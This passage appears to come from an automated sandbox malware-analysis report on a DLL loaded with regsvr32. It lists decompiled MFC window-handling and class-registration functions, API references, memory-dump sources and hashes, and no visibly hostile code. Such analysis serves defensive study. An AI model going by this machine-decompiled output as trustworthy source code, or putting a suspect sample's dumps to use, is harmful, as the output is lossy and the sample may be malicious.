					_t60 = SendMessageA(_t63, 0x376, 0, 0);
					if(_t60 == 0) {
						goto L6;
					} else {
						_t77 = _t60;
						L8:
						 *(_t79 - 0x74) =  *(_t79 - 0x74) & 0x00000000;
						if(_t77 != 0) {
							 *(_t79 - 0x74) =  *_t77;
							_t57 =  *((intOrPtr*)(_t79 + 0xb0));
							if(_t57 != 0) {
								 *_t77 = _t57 + 0x30000;
							}
						}
						if(( *(_t79 + 0xac) & 0x000000f0) == 0) {
							_t54 =  *(_t79 + 0xac) & 0x0000000f;
							if(_t54 <= 1) {
								_t24 = _t79 + 0xac;
								 *_t24 =  *(_t79 + 0xac) | 0x00000030;
								__eflags =  *_t24;
							} else {
								if(_t54 + 0xfffffffd <= 1) {
									 *(_t79 + 0xac) =  *(_t79 + 0xac) | 0x00000020;
								}
							}
						}
						_t96 = _t73;
						 *(_t79 - 0x6c) = 0;
						if(_t73 == 0) {
							_t64 = _t79 - 0x6c;
							_t73 = 0x104;
							__eflags = GetModuleFileNameA(0, _t64, 0x104) - 0x104;
							if(__eflags == 0) {
								 *((char*)(_t79 + 0x97)) = 0;
							}
						} else {
							_t64 =  *(_t73 + 0x50);
						}
						_push( *(_t79 + 0xac));
						_push(_t64);
						_push( *((intOrPtr*)(_t79 - 0x80)));
						_push( *(_t79 - 0x7c));
						_t74 = E1000C093(_t64, _t67, _t73, _t77, _t96);
						if(_t77 != 0) {
							 *_t77 =  *(_t79 - 0x74);
						}
						if( *(_t79 - 0x70) != 0) {
							EnableWindow( *(_t79 - 0x70), 1);
						}
						E1000C12A(1);
						_pop(_t75);
						_pop(_t78);
						_pop(_t65);
						return E100167D5(_t74, _t65,  *(_t79 + 0x98) ^ _t79, _t71, _t75, _t78);
					}
				}
			}

0x1000c209
0x1000c20a
0x1000c217
0x1000c21e
0x1000c22d
0x1000c233
0x1000c236
0x1000c239
0x1000c23e
0x1000c249
0x1000c24e
0x1000c251
0x1000c256
0x1000c256
0x1000c25c
0x1000c264
0x1000c26c
0x1000c291
0x1000c291
0x1000c293
0x1000c295
0x1000c295
0x00000000
0x1000c279
0x1000c283
0x1000c28b
0x00000000
0x1000c28d
0x1000c28d
0x1000c298
0x1000c298
0x1000c29e
0x1000c2a2
0x1000c2a5
0x1000c2ad
0x1000c2b4
0x1000c2b4
0x1000c2ad
0x1000c2bd
0x1000c2c5
0x1000c2cb
0x1000c2de
0x1000c2de
0x1000c2de
0x1000c2cd
0x1000c2d3
0x1000c2d5
0x1000c2d5
0x1000c2d3
0x1000c2cb
0x1000c2e5
0x1000c2e7
0x1000c2eb
0x1000c2f2
0x1000c2f5
0x1000c306
0x1000c308
0x1000c30a
0x1000c30a
0x1000c2ed
0x1000c2ed
0x1000c2ed
0x1000c311
0x1000c317
0x1000c318
0x1000c31b
0x1000c328
0x1000c32a
0x1000c32f
0x1000c32f
0x1000c335
0x1000c33c
0x1000c33c
0x1000c344
0x1000c352
0x1000c353
0x1000c356
0x1000c363
0x1000c363
0x1000c28b

APIs

Part of subcall function 1000C15E: GetParent.USER32(100014EC), ref: 1000C1B1
Part of subcall function 1000C15E: GetLastActivePopup.USER32(100014EC), ref: 1000C1C0
Part of subcall function 1000C15E: IsWindowEnabled.USER32(100014EC), ref: 1000C1D5
Part of subcall function 1000C15E: EnableWindow.USER32(100014EC,00000000), ref: 1000C1E8

EnableWindow.USER32(?,00000001), ref: 1000C256
GetWindowThreadProcessId.USER32(?,?), ref: 1000C264
GetCurrentProcessId.KERNEL32 ref: 1000C26E
SendMessageA.USER32 ref: 1000C283
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1000C300
EnableWindow.USER32(?,00000001), ref: 1000C33C

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID:
API String ID: 1877664794-0
Opcode ID: d475a19da1505cd8c491af7de1dd181a650697f179afdcdb5f27c752af681c02
Instruction ID: 906afa4fd5bad6b09c7d7bb12576003d117f5a582180c2333a3862cf80afbe79
Opcode Fuzzy Hash: d475a19da1505cd8c491af7de1dd181a650697f179afdcdb5f27c752af681c02
Instruction Fuzzy Hash: A1416A32A0035C9FFB31CFA58C85FDD7BA8EF05390F210129E949AB286D7709A408B50

Uniqueness

Uniqueness Score: -1.00%

Function 1000C15E, Relevance: 9.1, APIs: 6, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000C15E(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E1000C087();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x20);
					goto L7;
				}
				_t13 = E1000A7CE();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}

0x1000c166
0x1000c16e
0x1000c170
0x1000c18d
0x1000c19b
0x1000c1a6
0x1000c1a8
0x1000c1aa
0x1000c1ac
0x1000c1b7
0x1000c1b9
0x1000c1c6
0x1000c1c6
0x1000c1c8
0x1000c1ce
0x1000c1d2
0x1000c1f0
0x1000c1e3
0x1000c1e6
0x1000c1e8
0x1000c1e8
0x1000c1d2
0x1000c1f9
0x00000000
0x00000000
0x00000000
0x1000c1ae
0x1000c1ae
0x1000c1af
0x1000c1b1
0x1000c1b3
0x00000000
0x1000c1ae
0x1000c1a0
0x1000c1a2
0x1000c1a4
0x00000000
0x00000000
0x00000000
0x1000c1a4
0x1000c172
0x1000c179
0x1000c188
0x1000c188
0x00000000
0x1000c188
0x1000c17b
0x1000c182
0x00000000
0x00000000
0x1000c184
0x00000000

APIs

GetWindowLongA.USER32 ref: 1000C190
GetParent.USER32(100014EC), ref: 1000C19E
GetParent.USER32(100014EC), ref: 1000C1B1
GetLastActivePopup.USER32(100014EC), ref: 1000C1C0
IsWindowEnabled.USER32(100014EC), ref: 1000C1D5
EnableWindow.USER32(100014EC,00000000), ref: 1000C1E8

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 716a915a51b72e7755bd765e65025d5e7cdfb43fa73cbfe2d9e3b7854765710c
Instruction ID: b03ffd99d979528eb1576ebd7f6c5d6629826c0934e428a14188cd3025a76a69
Opcode Fuzzy Hash: 716a915a51b72e7755bd765e65025d5e7cdfb43fa73cbfe2d9e3b7854765710c
Instruction Fuzzy Hash: CC11A33264533A57F221DB698C80F9A72ECDF4BAD0F260129FC44E329ADB60DC0242D5

Uniqueness

Uniqueness Score: -1.00%

Function 1001411A, Relevance: 9.0, APIs: 6, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E1001411A(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_push(5);
				_push(_a4);
				while(1) {
					_t12 = GetWindow();
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_push(2);
					_push(_t21);
				}
				return _t12;
			}

0x10014129
0x10014135
0x10014137
0x1001417a
0x1001417a
0x1001417c
0x10014180
0x00000000
0x00000000
0x10014146
0x1001415d
0x10014163
0x10014175
0x00000000
0x10014188
0x10014175
0x10014177
0x10014179
0x10014179
0x10014185

APIs

ClientToScreen.USER32(?,?), ref: 10014129
GetDlgCtrlID.USER32(00000000), ref: 1001413D
GetWindowLongA.USER32 ref: 1001414B
GetWindowRect.USER32 ref: 1001415D
PtInRect.USER32(?,?,?), ref: 1001416D
GetWindow.USER32(?,00000005), ref: 1001417A

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: fd09e00dcf5aea0f889a5d5334f0ce8489c3ad9d17b5f7afd937dd6b6d05cc64
Instruction ID: 106842abd73dbf2249684b53af78e8d9c6ae05809ec90903e9ae8d6f26667822
Opcode Fuzzy Hash: fd09e00dcf5aea0f889a5d5334f0ce8489c3ad9d17b5f7afd937dd6b6d05cc64
Instruction Fuzzy Hash: AA014F36500126BBDB12DF658C48EDE77ACEF15791F124114F911AA1A0DB30DA82CA94

Uniqueness

Uniqueness Score: -1.00%

Function 10012406, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E10012406(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				signed int _v56;
				void* __ebp;
				intOrPtr _t122;
				void* _t128;
				intOrPtr _t130;
				signed int _t139;
				signed int _t144;
				signed int _t175;
				signed int _t177;
				signed int _t179;
				signed int _t181;
				signed int _t183;
				signed int _t187;
				void* _t190;
				intOrPtr _t191;
				signed int _t201;

				_t190 = __ecx;
				_t122 = E1000D5EC(__ebx, __edi, __esi, __eflags);
				_v8 = _t122;
				_t3 =  &_a4;
				 *_t3 = _a4 &  !( *(_t122 + 0x18));
				if( *_t3 == 0) {
					return 1;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t201 = 0;
				E100174D0(0,  &_v56, 0, 0x28);
				_v52 = DefWindowProcA;
				_t128 = E1000D5EC(__ebx, 0, 0, __eflags);
				__eflags = _a4 & 0x00000001;
				_v40 =  *((intOrPtr*)(_t128 + 8));
				_t130 =  *0x1005aa70; // 0x10003
				_t187 = 8;
				_v32 = _t130;
				_v16 = _t187;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0xb;
					_v20 = "AfxWnd80s";
					_t183 = E10012222(_t187, _t190, 0, 0, __eflags);
					__eflags = _t183;
					if(_t183 != 0) {
						_t201 = 1;
						__eflags = 1;
					}
				}
				__eflags = _a4 & 0x00000020;
				if(__eflags != 0) {
					_v56 = _v56 | 0x0000008b;
					_push( &_v56);
					_v20 = "AfxOleControl80s";
					_t181 = E10012222(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t181;
					if(_t181 != 0) {
						_t201 = _t201 | 0x00000020;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000002;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0;
					_v20 = "AfxControlBar80s";
					_v28 = 0x10;
					_t179 = E10012222(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t179;
					if(_t179 != 0) {
						_t201 = _t201 | 0x00000002;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000004;
				if(__eflags != 0) {
					_v56 = _t187;
					_v28 = 0;
					_t177 = E100123C5(_t190, __eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
					__eflags = _t177;
					if(_t177 != 0) {
						_t201 = _t201 | 0x00000004;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & _t187;
				if(__eflags != 0) {
					_v56 = 0xb;
					_v28 = 6;
					_t175 = E100123C5(_t190, __eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
					__eflags = _t175;
					if(_t175 != 0) {
						_t201 = _t201 | _t187;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000010;
				if(__eflags != 0) {
					_v12 = 0xff;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0);
					_t48 =  &_a4;
					 *_t48 = _a4 & 0xffffc03f;
					__eflags =  *_t48;
				}
				__eflags = _a4 & 0x00000040;
				if(__eflags != 0) {
					_v12 = 0x10;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000080;
				if(__eflags != 0) {
					_v12 = 2;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000100;
				if(__eflags != 0) {
					_v12 = _t187;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000200;
				if(__eflags != 0) {
					_v12 = 0x20;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000400;
				if(__eflags != 0) {
					_v12 = 1;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000800;
				if(__eflags != 0) {
					_v12 = 0x40;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00001000;
				if(__eflags != 0) {
					_v12 = 4;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00002000;
				if(__eflags != 0) {
					_v12 = 0x80;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00004000;
				if(__eflags != 0) {
					_v12 = 0x800;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00008000;
				if(__eflags != 0) {
					_v12 = 0x400;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00010000;
				if(__eflags != 0) {
					_v12 = 0x200;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00020000;
				if(__eflags != 0) {
					_v12 = 0x100;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00040000;
				if(__eflags != 0) {
					_v12 = 0x8000;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
					__eflags = _t201;
				}
				_t191 = _v8;
				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
				_t139 =  *(_t191 + 0x18);
				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
				if((_t139 & 0x00003fc0) == 0x3fc0) {
					 *(_t191 + 0x18) = _t139 | 0x00000010;
					_t201 = _t201 | 0x00000010;
					__eflags = _t201;
				}
				asm("sbb eax, eax");
				_t144 =  ~((_t201 & _a4) - _a4) + 1;
				__eflags = _t144;
				return _t144;
			}

0x10012406
0x1001240c
0x10012411
0x10012419
0x10012419
0x1001241c
0x00000000
0x10012420
0x10012426
0x10012427
0x10012428
0x10012432
0x10012434
0x10012441
0x10012444
0x10012449
0x10012452
0x10012455
0x1001245a
0x1001245b
0x1001245e
0x10012461
0x10012466
0x10012467
0x1001246e
0x10012475
0x1001247a
0x1001247c
0x1001247e
0x1001247e
0x1001247e
0x1001247c
0x1001247f
0x10012483
0x10012485
0x1001248f
0x10012490
0x10012497
0x1001249c
0x1001249e
0x100124a0
0x100124a0
0x100124a0
0x1001249e
0x100124a3
0x100124a7
0x100124ac
0x100124ad
0x100124b0
0x100124b7
0x100124be
0x100124c3
0x100124c5
0x100124c7
0x100124c7
0x100124c7
0x100124c5
0x100124ca
0x100124ce
0x100124de
0x100124e1
0x100124e4
0x100124e9
0x100124eb
0x100124ed
0x100124ed
0x100124ed
0x100124eb
0x100124f0
0x100124f3
0x10012503
0x1001250a
0x10012511
0x10012516
0x10012518
0x1001251a
0x1001251a
0x1001251a
0x10012518
0x1001251c
0x10012520
0x1001252b
0x10012537
0x10012539
0x10012539
0x10012539
0x10012539
0x10012540
0x10012544
0x1001254c
0x10012558
0x10012558
0x10012558
0x1001255a
0x1001255e
0x10012569
0x10012575
0x10012575
0x10012575
0x1001257c
0x1001257f
0x10012586
0x1001258e
0x1001258e
0x1001258e
0x10012595
0x10012598
0x1001259f
0x100125ab
0x100125ab
0x100125ab
0x100125b2
0x100125b5
0x100125bc
0x100125c8
0x100125c8
0x100125c8
0x100125cf
0x100125d2
0x100125d9
0x100125e5
0x100125e5
0x100125e5
0x100125ec
0x100125ef
0x100125f6
0x10012602
0x10012602
0x10012602
0x10012609
0x1001260c
0x10012613
0x1001261f
0x1001261f
0x1001261f
0x10012626
0x10012629
0x10012630
0x10012638
0x10012638
0x10012638
0x1001263f
0x10012642
0x10012649
0x10012651
0x10012651
0x10012651
0x10012658
0x1001265b
0x10012662
0x1001266e
0x1001266e
0x1001266e
0x10012675
0x10012678
0x1001267f
0x1001268b
0x1001268b
0x1001268b
0x10012692
0x10012695
0x1001269c
0x100126a4
0x100126a4
0x100126a4
0x100126a6
0x100126a9
0x100126ac
0x100126b8
0x100126ba
0x100126bf
0x100126c2
0x100126c2
0x100126c2
0x100126d1
0x100126d3
0x100126d3
0x00000000

APIs

_memset.LIBCMT ref: 10012434

Strings

AfxMDIFrame80s, xrefs: 100124D5
AfxFrameOrView80s, xrefs: 100124FA
@, xrefs: 10012540
@, xrefs: 100125D9

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
API String ID: 2102423945-4122032997
Opcode ID: 6a965a47b8202c06a0f9d29b019c3ce5b36ca544f607173cb73e005fb23cc034
Instruction ID: 475a3f3acc0ffbf0912b6f4f501dab117ae518df3bc7e116c44220daacf7d2ae
Opcode Fuzzy Hash: 6a965a47b8202c06a0f9d29b019c3ce5b36ca544f607173cb73e005fb23cc034
Instruction Fuzzy Hash: 658130B5D00259AADB41CFA4C581BDEBBF8FF08384F118165F949EA181E774DAD4CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 100017E0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 134windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1000C4C7: _memset.LIBCMT ref: 1000C4DE

_strlen.LIBCMT ref: 100018FF
_strlen.LIBCMT ref: 10001971
_strlen.LIBCMT ref: 100019B6
LoadIconA.USER32 ref: 100019FD

Strings

127.0.0.1, xrefs: 100018E8, 100018FA, 1000190E

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: _strlen$IconLoad_memset
String ID: 127.0.0.1
API String ID: 858515944-3619153832
Opcode ID: e9afa9abf4479f427d282929ffcd92459c0614fc8bef9fc4e3152ff44be5b39a
Instruction ID: 391a885bd144bb184e99009df4bcd3f8a2a5cd6933164126564d3f2e09fb5126
Opcode Fuzzy Hash: e9afa9abf4479f427d282929ffcd92459c0614fc8bef9fc4e3152ff44be5b39a
Instruction Fuzzy Hash: 835106B4D04298DBEB14CFA4D891B9DBBB1EF44344F1081A9E50D6B386DB356E44CF60

Uniqueness

Uniqueness Score: -1.00%

Function 1001486F, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E1001486F(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
				signed int _v8;
				short _v72;
				char* _v76;
				signed int _v80;
				signed int* _v84;
				signed int _v88;
				intOrPtr _v92;
				void* __edi;
				void* __ebp;
				signed int _t54;
				void* _t66;
				short* _t70;
				signed int _t72;
				signed int _t81;
				signed int* _t83;
				short* _t84;
				void* _t91;
				signed int* _t98;
				signed int _t99;
				void** _t100;
				intOrPtr _t102;
				signed int _t104;
				signed int _t106;
				void* _t107;

				_t101 = __esi;
				_t97 = __edx;
				_t82 = __ebx;
				_t54 =  *0x10057a08; // 0x7d1a16f8
				_v8 = _t54 ^ _t106;
				_t100 = __ecx;
				_v76 = _a4;
				if(__ecx[1] != 0) {
					_push(__ebx);
					_push(__esi);
					_t83 = GlobalLock( *__ecx);
					_v84 = _t83;
					_v88 = 0 | _t83[0] == 0x0000ffff;
					_v80 = E100146B2(_t83);
					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
					_v92 = _t102;
					if(_v88 == 0) {
						 *_t83 =  *_t83 | 0x00000040;
					} else {
						_t83[3] = _t83[3] | 0x00000040;
					}
					if(lstrlenA(_v76) >= 0x20) {
						L15:
						_t66 = 0;
					} else {
						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
						_v76 = _t97;
						if(_t97 < _t102) {
							goto L15;
						} else {
							_t70 = E100146DD(_t83);
							_t91 = 0;
							_t84 = _t70;
							if(_v80 != 0) {
								_t81 = E100169F6(_t84 + _t102);
								_t97 = _v76;
								_t91 = _t102 + 2 + _t81 * 2;
							}
							_t33 = _t97 + 3; // 0x3
							_t98 = _v84;
							_t36 = _t84 + 3; // 0x10002
							_t72 = _t91 + _t36 & 0xfffffffc;
							_t104 = _t84 + _t33 & 0xfffffffc;
							_v80 = _t72;
							if(_v88 == 0) {
								_t99 =  *(_t98 + 8) & 0x0000ffff;
							} else {
								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
							}
							if(_v76 == _t91 || _t99 <= 0) {
								L17:
								 *_t84 = _a8;
								_t97 =  &_v72;
								E100147F2(_t84 + _v92, _t100, _t104, _t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
								_t100[1] = _t100[1] + _t104 - _v80;
								GlobalUnlock( *_t100);
								_t100[2] = _t100[2] & 0x00000000;
								_t66 = 1;
							} else {
								_t97 = _t100[1];
								_t95 = _t97 - _t72 + _v84;
								if(_t97 - _t72 + _v84 <= _t97) {
									E100147F2(_t84, _t100, _t104, _t106, _t104, _t95, _t72, _t95);
									_t107 = _t107 + 0x10;
									goto L17;
								} else {
									goto L15;
								}
							}
						}
					}
					_pop(_t101);
					_pop(_t82);
				} else {
					_t66 = 0;
				}
				return E100167D5(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
			}

0x1001486f
0x1001486f
0x1001486f
0x10014875
0x1001487c
0x10014883
0x10014889
0x1001488c
0x10014895
0x10014896
0x1001489f
0x100148ad
0x100148b0
0x100148b8
0x100148ce
0x100148d0
0x100148d3
0x100148db
0x100148d5
0x100148d5
0x100148d5
0x100148ea
0x10014968
0x10014968
0x100148ec
0x10014901
0x10014906
0x10014909
0x00000000
0x1001490b
0x1001490c
0x10014912
0x10014917
0x10014919
0x1001491f
0x10014924
0x10014928
0x10014928
0x1001492c
0x10014930
0x10014933
0x10014937
0x1001493a
0x10014941
0x10014944
0x1001494c
0x10014946
0x10014946
0x10014946
0x10014953
0x10014978
0x1001497f
0x10014988
0x10014990
0x1001499d
0x100149a0
0x100149a6
0x100149ac
0x1001495a
0x1001495a
0x10014961
0x10014966
0x10014970
0x10014975
0x00000000
0x00000000
0x00000000
0x00000000
0x10014966
0x10014953
0x10014909
0x100149ad
0x100149ae
0x1001488e
0x1001488e
0x1001488e
0x100149bb

APIs

GlobalLock.KERNEL32 ref: 10014899
lstrlenA.KERNEL32(?), ref: 100148E1
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 100148FB

Strings

System, xrefs: 10014895

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteCharGlobalLockMultiWidelstrlen
String ID: System
API String ID: 1529587224-3470857405
Opcode ID: 5539861cf9964bd4a1f8d2b85f820bea2489ddcf645bd320d082abb330923d9c
Instruction ID: 74ffa1d7f554f06ed3380e5a1b3eb1278af2c0b09513685a0b874fafc39ddc5e
Opcode Fuzzy Hash: 5539861cf9964bd4a1f8d2b85f820bea2489ddcf645bd320d082abb330923d9c
Instruction Fuzzy Hash: FA41B271D00225DFDB04DFA4C885AAEBBB5FF04354F268129E411EF195EB70E986CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000B3AF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E1000B3AF(void* __edx, signed int _a116, char _a120) {
				void _v12;
				char _v16;
				signed int _v20;
				int _v24;
				char _v124;
				char _v172;
				intOrPtr _v184;
				int __ebx;
				signed int __edi;
				signed int __esi;
				signed int __ebp;
				signed int _t26;
				unsigned int _t28;
				intOrPtr _t35;
				unsigned int _t39;
				intOrPtr _t40;
				void* _t42;
				void* _t43;
				signed int _t45;

				_t45 =  &_v124;
				_t26 =  *0x10057a08; // 0x7d1a16f8
				_a116 = _t26 ^ _t45;
				_push(_t43);
				_push(_t42);
				_t28 = GetMenuCheckMarkDimensions();
				_t38 = _t28;
				_t39 = _t28 >> 0x10;
				_v24 = _t39;
